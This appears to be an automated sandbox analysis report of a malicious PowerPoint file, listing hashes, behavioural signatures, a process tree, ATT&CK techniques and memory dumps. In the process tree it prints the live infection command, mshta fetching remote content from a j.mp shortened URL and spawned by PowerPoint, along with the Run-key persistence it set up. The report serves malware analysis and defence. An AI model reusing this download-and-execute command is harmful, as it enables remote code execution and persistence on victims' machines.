Analysis

  • max time kernel
    67s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    24-02-2021 17:10

General

  • Target

    DOC.ppt

  • Size

    141KB

  • MD5

    53f09cdb89620ee0d02c006d5bdf758f

  • SHA1

    caf1ff6f5563d23eac7c547f2309c0608ae3029f

  • SHA256

    a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca

  • SHA512

    60374ee268f24ce193c860caf5ccf779a94388f44923bf2ecd5ba3273dfe937c4d8f960cdd906f56eccd39a81623636a2b07c22f116de8f1ee48cbe5f89b8a94

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 13 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DOC.ppt"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1984
      • C:\Windows\SysWOW64\mSHtA.exe
        mSHtA http://12384928198391823%12384928198391823@j.mp/akawdowdkwoapdlwnduhand
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Modifies Internet Explorer settings
        PID:336
      • C:\Windows\SysWOW64\ping.exe
        ping
        2⤵
        • Process spawned unexpected child process
        • Runs ping.exe
        PID:1208
      • C:\Program Files (x86)\Microsoft Office\Office14\winword.exe
        winword
        2⤵
        • Drops file in Windows directory
        • Suspicious use of SetWindowsHookEx
        PID:724

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    2
    T1112

    Discovery

    Remote System Discovery

    1
    T1018

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/328-8-0x000007FEF7E60000-0x000007FEF80DA000-memory.dmp
      Filesize

      2.5MB

    • memory/336-7-0x0000000000000000-mapping.dmp
    • memory/724-10-0x0000000000000000-mapping.dmp
    • memory/724-11-0x00000000698C1000-0x00000000698C4000-memory.dmp
      Filesize

      12KB

    • memory/1208-9-0x0000000000000000-mapping.dmp
    • memory/1984-5-0x0000000000000000-mapping.dmp
    • memory/1984-6-0x000007FEFC511000-0x000007FEFC513000-memory.dmp
      Filesize

      8KB

    • memory/2028-2-0x0000000074C81000-0x0000000074C85000-memory.dmp
      Filesize

      16KB

    • memory/2028-3-0x0000000071D11000-0x0000000071D13000-memory.dmp
      Filesize

      8KB

    • memory/2028-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB